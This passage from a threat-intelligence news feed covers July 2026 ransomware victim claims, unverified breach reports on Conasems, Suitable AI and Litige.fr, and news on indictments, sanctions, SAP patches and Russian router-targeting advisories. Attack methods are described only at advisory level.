2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/239785629738649273864987236598762351.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/239785629738649273864987236598762351.png) ### ⚠Potential impact A compromise of a national land-registry agency is severe because its records underpin property ownership, transactions, and citizens' personal and address data across the entire country. Theft of the agency's source code would expose how its core systems work and aid future attacks, while a ransomware deployment against government infrastructure can disrupt essential public services, consistent with the reported shutdown of ANCPI's IT systems. If genuine, the exposure carries lasting risks of fraud, property-related crime, and identity theft for affected citizens. The claim is unverified. ### iStatus Unverified This is a sale listing that also describes a network intrusion and a claimed ransomware deployment, promoted with multiple distribution and contact channels. The actor separately references a government notice about an IT-systems shutdown at the agency. The claim is **unverified** and ANCPI has not publicly confirmed the extent of any breach. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Ransomware Attack Update - July 14th, 2026 URL: https://darkwebinformer.com/ransomware-attack-update-july-14th-2026/ Last updated: 2026-07-14T22:11:27.000Z ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Ransomware Feed Browse the latest ransomware victim claims, threat groups, and related activity. [View Feed](https://darkwebinformer.com/ransomware-feed) ### Socials Follow Dark Web Informer across all official platforms. [Follow](https://darkwebinformer.com/socials) --- 31 claims 11 groups 18 countries Ransomware Recap # July 14, 2026 12:01 AM – 11:59 PM UTC 31Claims 11Groups 18Countries DragonForceMost Active Group Activity ✕ Count A–Z Expand Collapse \= country not specified No matches found. ### DragonForce 11 - Edison Global Networks Limited - SITAV SpA - Graphic International Centre - Road Ahead Technologies Consultant - Intron Technology Holdings - Atcom - Midal Cables - Omax Autos - Ifage - asimar.com - momenta.cn ### Arcus Media 6 - Perpustam - gemese.pt - Distribox - Be Travel - COREBI (NowVertical) - I-FITNESS ### Chaos 3 - sleemanbreweries.ca - spectrumchemical.com - aphenapharma.com ### Qilin 2 - THL - Sedemi ### INC Ransom 2 - Golden Glasko & Associates - VantagePoint Management & Autoclear ### BlackNevas 2 - Arkın Group - L'azurde ### Coinbase Cartel 1 - Axiom Global ### Nightspire 1 - Cedar Crest College ### PayoutsKing 1 - Casta Diva Group ### AiLock 1 - WBF Construction ### CMD Organization 1 - Target Energy Solutions ### U.S. Indicts Three Russians and Two Bulletproof Hosting Companies Over $62M in Cybercrime Losses URL: https://darkwebinformer.com/u-s-indicts-three-russians-and-two-bulletproof-hosting-companies-over-62m-in-cybercrime-losses/ Last updated: 2026-07-14T20:43:07.000Z The U.S. Justice Department has unsealed an indictment charging three Russian nationals and two St. Petersburg-based companies over an alleged bulletproof hosting operation that caused more than $62 million in losses to cybercrime victims. The defendants are Alexander Alexandrovich Volosovik, Kirill Andreevich Zatolokin, Yulia Vladimirovna Pankova, Media Land LLC, and ML.Cloud LLC. The [indictment was returned in December 2024](https://www.justice.gov/opa/pr/three-russian-nationals-and-two-companies-indicted-international-cybercrimes-resulting-more) and unsealed on July 14, 2026, in the Northern District of Ohio. Prosecutors charged the defendants with conspiracy to commit and aid and abet computer fraud, conspiracy to commit wire fraud, wire fraud, and conspiracy to commit money laundering. ### Companies Allegedly Provided Bulletproof Hosting Media Land and ML.Cloud allegedly supplied servers and related internet services designed to allow cybercriminal customers to conduct illegal activity while avoiding detection and disruption by law enforcement. The companies are accused of providing [bulletproof hosting infrastructure](https://www.justice.gov/opa/pr/three-russian-nationals-and-two-companies-indicted-international-cybercrimes-resulting-more) that allowed criminal groups to infect computers with ransomware and malware, extort victims for cryptocurrency, operate criminal marketplaces, register fraudulent domains, and launch phishing and brute-force attacks. Media Land was owned by Volosovik, while ML.Cloud was owned by Pankova at the time of the investigation and indictment. Zatolokin allegedly worked for Media Land, collecting customer payments and coordinating with other malicious cyber actors. Although the companies were headquartered in St. Petersburg, Media Land allegedly operated infrastructure in several countries, including China, Finland, the Netherlands, and the United States. ### Banks, Hospitals and Government Entities Targeted The Justice Department says criminal groups using the defendants’ infrastructure targeted [42 victims across 21 U.S. states](https://www.justice.gov/opa/pr/three-russian-nationals-and-two-companies-indicted-international-cycrimes-resulting-more). The affected organizations included banks, schools, hospitals, government entities, media companies, and other institutions supporting communities and critical services. Rewards for Justice says Media Land supplied services to multiple malicious cyber actors, including the [LockBit, BlackSuit, and Play ransomware groups](https://rewardsforjustice.net/rewards/media-land/). The infrastructure was also allegedly used for distributed denial-of-service attacks, phishing campaigns, criminal forums, and online marketplaces. The State Department says the operation supported hundreds of malicious cyber activities between 2016 and 2024, contributing to tens of millions of dollars in damages. ### Up to $10 Million Reward Offered Alongside the indictment, the State Department’s Rewards for Justice program announced an [offer of up to $10 million](https://rewardsforjustice.net/rewards/media-land/) for actionable information involving the defendants and their alleged activities. The reward applies to information on foreign government-linked associates of Volosovik, Zatolokin, and Pankova, their malicious cyber activity, or foreign government-linked use of Media Land and ML.Cloud. The program is also offering possible relocation for qualifying sources who provide actionable information. Volosovik allegedly advertised Media Land on cybercriminal forums under the alias “Yalishanda,” promoting services designed to conceal malicious traffic, domains, and IP addresses. Rewards for Justice says he also supplied servers and troubleshooting assistance to ransomware and distributed denial-of-service actors. ### Defendants Previously Sanctioned The defendants and companies were previously targeted through [coordinated U.S., U.K., and Australian sanctions](https://home.treasury.gov/news/press-releases/sb0319) announced in November 2025. The sanctions included Volosovik, Zatolokin, Pankova, Media Land, ML.Cloud, Media Land Technology, and Data Center Kirishi. U.S. sanctions generally block property and financial interests under American jurisdiction and prohibit U.S. persons from conducting unauthorized transactions with designated individuals and entities. The criminal investigation was led by the FBI’s Cleveland Division with assistance from CISA and the Treasury Department’s Office of Foreign Assets Control. Authorities in the Netherlands, United Kingdom, and Australia also supported the investigation. The case forms part of Operation Riptide, an FBI campaign targeting cybercriminal actors, infrastructure providers, and financial networks supporting ransomware, fraud, and other cyber-enabled crime. ### Brazilian Health Council Conasems Allegedly Breached Again, 766,000 Users' Sensitive Data Leaked URL: https://darkwebinformer.com/brazilian-health-council-conasems-allegedly-breached-again-766-000-users-sensitive-data-leaked/ Last updated: 2026-07-14T17:06:19.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Government / Health Second Breach ## Brazilian Health Council Conasems Allegedly Breached Again, 766,000 Users' Sensitive Data Leaked A threat actor using the alias **888** claims to have leaked a database from **Conasems**, the National Council of Municipal Health Secretariats of Brazil (Conselho Nacional de Secretarias Municipais de Saúde). The actor describes it as a second, newer breach affecting **766,000 unique users**, following an earlier incident they attribute to themselves in November 2025\. According to the post, the data spans a wide range of fields, including full names, CPF national ID numbers, account passwords, emails, phone numbers, dates of birth, and locations, as well as highly sensitive categories such as **sexual orientation, gender identity, disability status, and racial or ethnic information**. The claim is **unverified**. Severity CRITICAL Users766,000 TypeHealth / PII Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Actor888 ### ▣Post details TargetConasems Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil SectorGovernment / Health Claim766,000 unique users DataCPF, passwords, contact, sensitive categories NoteSecond breach (after Nov 2025) ObservedJul 14, 2026 Actor888 ### !Allegedly included - 766,000 unique users - Full names & CPF national IDs - Account passwords - Emails & phone numbers - Dates of birth - Sexual orientation & gender identity - Disability status - Race & ethnicity data ### ◱Screenshots [ ![Conasems Brazil health council data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2356782893765982735698723659872635987235.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2356782893765982735698723659872635987235.png) [ ![Conasems Brazil health council data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2356782893765982735698723659872635987236.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2356782893765982735698723659872635987236.png) ### ⚠Potential impact Pairing CPF national ID numbers, account passwords, and contact details with special-category information (sexual orientation, gender identity, disability, and race) makes this an unusually sensitive exposure. Beyond the usual risks of identity theft, account compromise, and fraud, the disclosure of intimate attributes creates real potential for discrimination, outing, and targeted harassment of those affected. CPF numbers are core Brazilian identifiers and cannot be reset, and any exposed passwords would put linked accounts at immediate risk. As a repeat incident, it also points to security weaknesses that may not have been resolved. The claim is unverified. ### iStatus Unverified This is a data-leak post presented as a second breach of the organization, with the download gated behind forum points and several aliases credited alongside the poster (including IntelBroker, EnergyWeaponUser, and wonder). The claim is **unverified** and Conasems has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Welsh Doxbin Administrator Jailed for Encouraging Swatting Attacks Across Three Countries URL: https://darkwebinformer.com/welsh-doxbin-administrator-jailed-for-encouraging-swatting-attacks-across-three-countries/ Last updated: 2026-07-15T00:04:02.000Z **UPDATE:** The arrested individual known as 'KT' has been identified as not the genuine Doxbin administrator. Investigators say the suspect assumed the real owner's identity while orchestrating swatting attacks. The Register incorrectly made this claim. --- A Welsh man identified as an administrator of the dark web doxing platform Doxbin has been sentenced to prison for encouraging and assisting swatting attacks targeting people and organizations in the United Kingdom, United States, and Canada. Callum Dare, 26, of Talbot Green, received a sentence of [two years and three months at Cardiff Crown Court](https://www.cps.gov.uk/cymruwales/news/south-wales-man-sentenced-encouraging-swatting) after pleading guilty to encouraging or assisting the commission of malicious communications and possessing an article for use in fraud. Swatting involves making a false report of a serious emergency in an attempt to trigger an armed police response at an innocent person’s home, workplace, or another location. These incidents can place victims and responding officers at significant risk while diverting emergency resources from genuine emergencies. ### Doxbin Administrator Encouraged Attacks The international investigation began after the FBI contacted South Wales Police and the Tarian Regional Organised Crime Unit in May 2019. Investigators had traced a series of swatting incidents to Doxbin and a related chat channel where users discussed swatting, doxing, and other criminal activity. Dare was identified as a [Doxbin administrator and active participant in the platform’s #deadnet channel](https://www.theregister.com/security/2026/07/14/welsh-doxbin-admin-jailed-for-egging-on-swatters-from-behind-a-screen/5271281). Authorities said Dare did not personally place the hoax emergency calls. Instead, he encouraged and assisted other users in targeting people and organizations. Messages recovered during the investigation reportedly connected him to multiple incidents in the United States and Canada. Digital forensic evidence also showed that he produced edited video compilations of emergency responses using footage collected from livestreams and other online sources. The videos were shared inside the Doxbin channel to [encourage others to carry out similar swatting attacks](https://swanseabaynews.com/swatting-welsh-dark-web-administrator-jailed-over-hoax-that-shut-down-a-cardiff-city-centre-street/). ### Cardiff Street Evacuated Over Nail Bomb Hoax Investigators also linked Dare to a serious swatting incident in Cardiff on December 17, 2018. A caller contacted a journalist and falsely claimed to be armed with nail bombs while holding hostages inside the Sandringham Hotel on St Mary Street. Armed police responded by [evacuating and closing the busy city-centre street](https://www.cps.gov.uk/cymruwales/news/south-wales-man-sentenced-encouraging-swatting), causing significant disruption during the Christmas shopping period. A forensic examination of Dare’s devices uncovered CCTV footage, audio, and news coverage of the incident that had been edited into a video featuring the Doxbin logo. Another incident involved a false report to the Los Angeles Police Department claiming bombs had been placed beneath chairs inside a University of California lecture theatre. The threat also resulted in an evacuation. Other attacks discussed during the case targeted universities and individuals, including a Canadian programmer whose home was surrounded by police after a caller falsely claimed to have shot someone, taken hostages, and possessed explosives. ### Phishing Kit Found on Devices Police examining Dare’s devices also discovered a phishing kit known as “The Man in the Onion.” The software was designed to [imitate dark web marketplaces and capture login credentials](https://www.theregister.com/security/2026/07/14/welsh-doxbin-admin-jailed-for-egging-on-swatters-from-behind-a-screen/5271281). Investigators said the stolen information could potentially have been used to access cryptocurrency wallets, payment accounts, or other services belonging to dark web users. There was no evidence presented that Dare deployed the phishing kit in a real-world attack. He was nevertheless charged with possessing an article intended for use in fraud. ### International Investigation Leads to Sentencing The case involved cooperation between the FBI, Canadian authorities, South Wales Police, Tarian ROCU, and the Crown Prosecution Service. Investigators reportedly connected online usernames associated with the Doxbin administrator to a PayPal account, an email address, and eventually Dare’s identity and home address. The Crown Prosecution Service said Dare endangered people by [encouraging armed police responses for his own gratification](https://www.cps.gov.uk/cymruwales/news/south-wales-man-sentenced-encouraging-swatting). The case highlights how administrators and online participants can face criminal liability even when they do not personally make a hoax call. Encouraging attacks, providing information, celebrating incidents, or helping others select targets can still contribute directly to dangerous real-world consequences. Swatting is not a harmless online prank. False emergency reports can result in armed confrontations, injuries, deaths, widespread disruption, and emergency services being pulled away from people who genuinely need assistance. ### SAP Patches Critical NetWeaver, AppRouter, and Commerce Cloud Vulnerabilities URL: https://darkwebinformer.com/sap-patches-critical-netweaver-approuter-and-commerce-cloud-vulnerabilities/ Last updated: 2026-07-14T16:02:00.000Z SAP has released its July 2026 security updates, addressing three new critical vulnerabilities affecting NetWeaver Application Server ABAP, AppRouter, and Commerce Cloud. The company’s [July 2026 Security Patch Day bulletin](https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2026.html) lists 16 new security notes, one GitHub security advisory, and three updates to previously issued notes. The release also includes fixes for high-severity vulnerabilities involving remote code execution, DLL hijacking, cross-site scripting, open redirects, and third-party components. The most severe new vulnerability is CVE-2026-44747, a memory corruption issue in SAP NetWeaver Application Server ABAP with a CVSS score of 9.9. The flaw stems from logical errors in memory management and can be exploited by an authenticated attacker to cause an out-of-bounds write. Successful exploitation could allow unauthorized access to data, modification of information, or system unavailability. Affected NetWeaver kernel versions are identified in the [official SAP security bulletin](https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2026.html). SAP recommends installing a patched ABAP Kernel version as the primary remediation. As a temporary workaround, customers can disable all ICF nodes with a particular property through transaction SICF. However, [Onapsis warns](https://onapsis.com/blog/sap-security-patch-day-july-2026/) that this also disables the ability to open transactions through SAP GUI for HTML, making the workaround unsuitable for some environments. ### AppRouter Vulnerable to HTTP Request Smuggling SAP also patched CVE-2026-27690, a critical HTTP request smuggling vulnerability in AppRouter with a CVSS score of 9.1. The issue affects [SAP AppRouter Node.js packages earlier than version 20.10.0](https://support.sap.com/en/my-support/knowledge-base/security-notes-news/july-2026.html) when deployed outside Cloud Foundry environments. An unauthenticated attacker can send a specially crafted HTTP request that causes request-response desynchronization between systems. This could allow the attacker to access responses intended for other users or cause a denial-of-service condition. Customers should update the vulnerable Node.js package to a fixed version. SAP separately addressed a high-severity AppRouter open redirect vulnerability, CVE-2026-44745, in packages earlier than version 21.2.0. ### Sample Commerce Cloud Credentials Create Access Risk The third critical vulnerability, CVE-2026-44761, affects SAP Commerce Cloud and carries a CVSS score of 9.1. The issue is tied to sample configuration scripts previously provided through the SAP Help Portal for development and testing. These scripts created OAuth2 clients using publicly documented, hardcoded credentials. Older documentation did not clearly warn customers against importing the sample configuration into production. An unauthenticated attacker who knows the default credentials could obtain a valid access token and use certain APIs to [read or alter Commerce Cloud data](https://onapsis.com/blog/sap-security-patch-day-july-2026/). Not every Commerce Cloud environment is vulnerable. Exploitation requires a customer to have executed the sample script, retained the resulting OAuth2 client in production, and left the original client secret unchanged. Customers who removed the sample client or replaced its secret with a strong and unique value are not affected. Unlike a conventional software patch, SAP’s note updates the documentation. Administrators must manually audit production environments for the affected sample OAuth2 client and remove it when it still uses the publicly documented secret. ### Additional SAP Security Updates SAP also updated a June security note for CVE-2026-40128, a critical directory traversal vulnerability in the NetWeaver Application Server Java Web Container, to support additional packages. Other July fixes include a remote code execution vulnerability in the Change and Transport System Attach Tool, multiple Apache Camel and Apache Tomcat vulnerabilities, and a DLL hijacking issue affecting SAProuter on Windows. SAP has not identified evidence that the three newly disclosed critical vulnerabilities are being exploited in attacks. However, the company strongly recommends applying its July patches as a priority. Organizations should also review exposed SAP services, restrict administrative access, verify AppRouter package versions, and audit Commerce Cloud OAuth2 clients for credentials originating from sample configurations. ### U.S. Sanctions First VPN Service and Malware Obfuscation Provider Over Ransomware Support URL: https://darkwebinformer.com/u-s-sanctions-first-vpn-service-and-malware-obfuscation-provider-over-ransomware-support/ Last updated: 2026-07-13T22:45:58.000Z The United States has sanctioned a virtual private network provider, its administrator, and a malware obfuscation specialist for allegedly supplying services and tools used by ransomware groups targeting American organizations. The Treasury Department’s Office of Foreign Assets Control designated [First VPN Service, also known as 1VPNS](https://home.treasury.gov/news/press-releases/sb0559), along with its Ukrainian administrator, Dmytro Rashevskyi, and Belarusian national Yegeniy Vladimirovich Silayev. Treasury described 1VPNS as a VPN provider whose principal customers included ransomware operators and other cybercriminals. Numerous ransomware groups allegedly purchased infrastructure from the service and used it to conceal the origins of attacks, deliver malware, and manage exfiltrated information. Organizations targeted through infrastructure connected to the service included U.S. businesses, financial services companies, hospitals, and municipal governments. Ransomware groups using services supplied by the designated parties have caused [billions of dollars in losses](https://www.state.gov/releases/office-of-the-spokesperson/2026/07/sanctioning-ransomware-enablers-in-coordinated-international-action/) to American businesses and critical infrastructure providers, according to U.S. officials. First VPN Service had allegedly advertised on online cybercriminal forums since 2014\. Its marketing reportedly claimed that the company did not retain logs identifying its customers or their activity and would not cooperate with law enforcement investigations involving illegal conduct originating from its rented servers. Rashevskyi allegedly used the false identities “Maksim Sorin” and “Roman Chabanenko” to purchase infrastructure from companies that may otherwise have refused to work with him following [complaints about illegal activity](https://therecord.media/first-vpn-administrator-us-sanctions-ransomware-groups) originating from 1VPNS servers. The sanctions also target Silayev, who Treasury described as a provider of “cryptors” to ransomware operators attacking U.S. and allied organizations. Cryptors are designed to encrypt or obfuscate malicious code so malware appears harmless to security software. Unlike legitimate encryption products intended to protect data, these tools are specifically used to make ransomware and other malware [more difficult to detect or disable](https://home.treasury.gov/news/press-releases/sb0559). The action was coordinated with the United Kingdom’s Foreign, Commonwealth & Development Office, which announced separate sanctions against cybercriminals and other ransomware enablers. The designations follow a [May 2026 law enforcement operation](https://therecord.media/first-vpn-administrator-us-sanctions-ransomware-groups) that took down the First VPN Service website and other infrastructure. European authorities carried out the disruption with assistance from the FBI’s Boston Field Office. Under the sanctions, property and financial interests belonging to the designated individuals and entity that are located in the United States or controlled by U.S. persons must be blocked and reported to OFAC. Companies owned at least 50 percent by one or more blocked individuals are also subject to the restrictions. Unless specifically authorized, U.S. persons are generally prohibited from conducting transactions involving First VPN Service, Rashevskyi, or Silayev. The coordinated action reflects a broader shift in ransomware enforcement. Instead of focusing only on affiliates who deploy ransomware, authorities are increasingly targeting the hosting providers, VPN services, money launderers, access brokers, and malware developers that support the wider cybercrime economy. Disrupting one ransomware group may remove a single operation. Targeting shared infrastructure and specialist service providers can affect numerous criminal groups simultaneously. ### CISA Adds Cisco IOS Flaw Exploited by Russian FSB Actors to KEV Catalog URL: https://darkwebinformer.com/cisa-adds-cisco-ios-flaw-exploited-by-russian-fsb-actors-to-kev-catalog/ Last updated: 2026-07-13T18:45:07.000Z The U.S. Cybersecurity and Infrastructure Security Agency has added an 18-year-old Cisco IOS vulnerability to its Known Exploited Vulnerabilities catalog following confirmation that the flaw has been exploited in real-world attacks. The vulnerability, tracked as [CVE-2008-4128](https://nvd.nist.gov/vuln/detail/CVE-2008-4128), affects the HTTP Administration component in Cisco IOS 12.4 running on Cisco 871 Integrated Services Routers. The issue involves multiple cross-site request forgery vulnerabilities that can allow a remote attacker to trick an authenticated administrator into executing arbitrary commands. The malicious requests can invoke privilege-related commands or alter the router’s configuration through the web management interface. Although CISA assigned the vulnerability a CVSS 3.1 score of 4.3, its addition to the [Known Exploited Vulnerabilities catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field%5Fcve=CVE-2008-4128) means exploitation is no longer considered theoretical. The development follows a multinational advisory titled [Improve Router Hygiene to Protect Against Russian State-Sponsored Targeting](https://media.defense.gov/2026/Jul/09/2003959498/-1/-1/1/CSA%5FIMPROVE%5FROUTER%5FHYGIENE.PDF), which was released by U.S. and international cybersecurity and intelligence agencies. According to the advisory, actors associated with Russia’s Federal Security Service Center 16 have spent more than a decade targeting poorly configured and vulnerable networking devices. The activity has affected organizations across the communications, defense, energy, financial services, government, and healthcare sectors. [The agencies said the Russian](https://darkwebinformer.com/russian-state-sponsored-actors-target-vulnerable-routers-across-critical-infrastructure/) actors primarily scan for routers with exposed Simple Network Management Protocol services that accept common or default community strings. Compromised devices can be instructed to copy their configurations and transfer them to attacker-controlled infrastructure through protocols such as TFTP. The same actors have also exploited Cisco Smart Install and known vulnerabilities, including [CVE-2008-4128 and CVE-2018-0171](https://media.defense.gov/2026/Jul/09/2003959498/-1/-1/1/CSA%5FIMPROVE%5FROUTER%5FHYGIENE.PDF), to gain access to network devices. CVE-2008-4128 only affects end-of-life Cisco equipment. Cisco states that [IOS Software Release 12.4 Mainline is retired](https://www.cisco.com/c/en/us/obsolete/ios-nx-os-software/cisco-ios-software-releases-12-4-mainline.html) and has not been supported since January 31, 2016. Organizations still using affected devices should replace them with supported hardware rather than relying on an unsupported software branch. Network administrators should also disable unnecessary web management and Cisco Smart Install services, restrict management access with access control lists, and prevent router administration interfaces from being exposed to untrusted networks. The joint advisory additionally recommends disabling SNMPv1 and SNMPv2 where possible, using SNMPv3 with authentication and encryption, changing default community strings, and monitoring for unusual configuration transfers or inbound SNMP Set-Requests. The KEV addition highlights a recurring infrastructure security problem: an old vulnerability can remain operationally relevant for years when unsupported network devices are left exposed. Attackers do not need a new zero-day when legacy routers remain reachable and poorly configured. ### Russian State-Sponsored Actors Target Vulnerable Routers Across Critical Infrastructure URL: https://darkwebinformer.com/russian-state-sponsored-actors-target-vulnerable-routers-across-critical-infrastructure/ Last updated: 2026-07-13T18:07:38.000Z A joint cybersecurity advisory warns that cyber actors linked to the Russian Federal Security Service’s Center 16 continue to compromise poorly configured and vulnerable networking devices worldwide. The activity is associated with threat clusters tracked as Berserk Bear, Energetic Bear, Crouching Yeti, Dragonfly, Ghost Blizzard, and Static Tundra. The actors primarily scan internet-facing IP ranges for routers running SNMPv1 or SNMPv2 with default, common, or otherwise weak community strings. After locating an exposed device, they can send specially crafted SNMP Set-Requests that instruct the router to copy its configuration into a file, commonly named `config.bkp` or `output.txt`, and transfer it through TFTP to attacker-controlled infrastructure or a compromised FTP server. Stolen router configurations may expose network details and credentials, particularly when passwords are stored in plaintext or protected with weak Cisco hashing types. The actors have also exploited Cisco Smart Install and known vulnerabilities, including CVE-2018-0171 and CVE-2008-4128, to gain access to networking devices. The sectors considered most at risk include communications, defense, energy, financial services, government services, and healthcare. State and local government organizations are highlighted as particularly exposed. The advisory notes that the same weaknesses and techniques may also be used by other state-sponsored groups, including Salt Typhoon. Organizations are urged to migrate to SNMPv3 with strong authentication and encryption, disable SNMPv1 and SNMPv2, remove default community strings, disable Cisco Smart Install, and use strong unique credentials. Network administrators should also restrict management traffic through access control lists, monitor suspicious SNMP requests, patch vulnerable devices, replace end-of-life equipment, and block unnecessary external access to TFTP, SMI, and SNMP ports. Source (PDF): ### AI Recruitment Platform Suitable AI Allegedly Breached, Over 15,000 Applicants' Data Leaked in a Partial Dump URL: https://darkwebinformer.com/ai-recruitment-platform-suitable-ai-allegedly-breached-over-15-000-applicants-data-leaked-in-a-partial-dump/ Last updated: 2026-07-13T15:59:15.000Z Breach Report ![India flag](https://flagcdn.com/w40/in.png)India ![United States flag](https://flagcdn.com/w40/us.png)USA AI / Recruitment Active Vulnerability ## AI Recruitment Platform Suitable AI Allegedly Breached, Over 15,000 Applicants' Data Leaked in a Partial Dump A threat actor using the alias **NightBroker** claims to have breached **Suitable AI** (suitable.ai), an AI-powered recruitment platform based in India and the United States that helps STEM professionals find jobs. The actor posted a partial dump of **15,176 applicant records**, stating the platform holds around 53,681 applicants in total. According to the post, the data was obtained by abusing weaknesses in the platform's GraphQL API, including an authentication bypass and an unauthenticated query that returned applicant contact details. The leaked fields include names, emails, mobile numbers, resumes, locations, salary expectations, and internal recruiter and scoring data. The claim is **unverified**. Severity HIGH Data15,176 records Claimed total\~53,681 Country![India flag](https://flagcdn.com/w40/in.png)India / USA ActorNightBroker ### ▣Post details TargetSuitable AI (suitable.ai) Country![India flag](https://flagcdn.com/w40/in.png)India / USA SectorAI / Recruitment Claim15,176 records (partial dump) Claimed total\~53,681 applicants DataNames, contact, resumes, salary VectorGraphQL API weaknesses ActorNightBroker ### !Allegedly included - 15,176 applicant records (partial) - Names & emails - Mobile numbers - Resumes (CV files) - Locations - Salary expectations - Experience details - Recruiter & scoring data ### ◱Screenshots [ ![Suitable AI recruitment platform data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2357892349768239786592873498723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2357892349768239786592873498723.png) [ ![Suitable AI recruitment platform data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2357892349768239786592873498724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/2357892349768239786592873498724.png) ### ⚠Potential impact Recruitment data is sensitive because it ties named individuals to their contact details, resumes, career history, and salary expectations, all of which fuel targeted phishing, recruitment scams, and identity fraud. The exposure of resume files and professional profiles is especially useful to attackers building convincing lures. The actor also describes an authentication bypass and unauthenticated data access, which, if still present, would place the wider applicant base well beyond the 15,176 records posted at risk. The claim is unverified. ### iStatus Unverified This is a partial data-leak post with the download gated behind forum points; it also describes the API weaknesses used. Operators should review authentication and authorization on their API, restrict unauthenticated data queries, and patch outdated server software. The claim is **unverified** and Suitable AI has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Legal Platform Litige France Allegedly Breached, Nearly 595,000 Users' Data Exposed Through Access-Control Flaws URL: https://darkwebinformer.com/french-legal-platform-litige-fr-allegedly-breached-nearly-595-000-users-data-exposed-through-access-control-flaws/ Last updated: 2026-07-13T15:46:21.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Legal Services Active Vulnerability ## French Legal Platform Litige.fr Allegedly Breached, Nearly 595,000 Users' Data Exposed Through Access-Control Flaws Two threat actors using the aliases **misere** and **ChimeraZ** claim to have breached **Litige.fr**, a French online legal-services and debt-recovery platform, and are leaking data they say covers **595,024 users**. According to the post, the records were pulled through unauthenticated access-control flaws that returned user data without any login, and include names, emails, IP and postal addresses, dates and places of birth, nationality, profession, phone numbers, and business and legal-case details. One actor disputes an earlier claim of 2 million users. The actors also describe account-takeover and staff-dashboard access, suggesting the underlying weaknesses may still be exploitable. The claim is **unverified**. Severity CRITICAL Users595,024 TypeLegal / PII Country![France flag](https://flagcdn.com/w40/fr.png)France Actorsmisere & ChimeraZ ### ▣Post details TargetLitige.fr Country![France flag](https://flagcdn.com/w40/fr.png)France SectorLegal services / Debt recovery Claim595,024 users breached DataNames, contact, IPs, legal/business info VectorUnauthenticated access-control flaws ObservedJul 13, 2026 Actorsmisere & ChimeraZ ### !Allegedly included - 595,024 user records - Names & emails - Phone numbers - Postal & IP addresses - Dates & places of birth - Nationality & profession - Business & company details - Legal-case information ### ◱Screenshot [ ![Litige.fr French legal platform data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/978259872364897236498752369872398476.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/978259872364897236498752369872398476.png) ### ⚠Potential impact Exposing nearly 595,000 people's identities, contact details, IP and postal addresses, and legal-case information is severe on its own, and it is compounded by the platform's debt-recovery and litigation context, where the data can reveal individuals' disputes, adversaries, and claimed amounts. The actors describe not only data exposure but account takeover and access to a staff dashboard tied to payment processing and enterprise clients, which would mean the compromise is potentially ongoing rather than a one-time leak. Affected users and businesses face heightened risks of fraud, impersonation, and targeting. The claim is unverified. ### iStatus Unverified This is a data-leak post with the download gated behind forum points; it also includes a detailed description of the access-control weaknesses used. Operators should treat this as a possible active exposure, review unauthenticated access to user and document endpoints, and rotate affected credentials. The claim is **unverified** and Litige.fr has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Ransomware Attack Update - July 11th, 2026 URL: https://darkwebinformer.com/ransomware-attack-update-july-11th-2026/ Last updated: 2026-07-12T00:24:50.000Z ### API Access Authenticated access to threat intelligence, ransomware data, IOC history, and exports. [View API](https://darkwebinformer.com/api-details/) ### Ransomware Feed Browse the latest ransomware 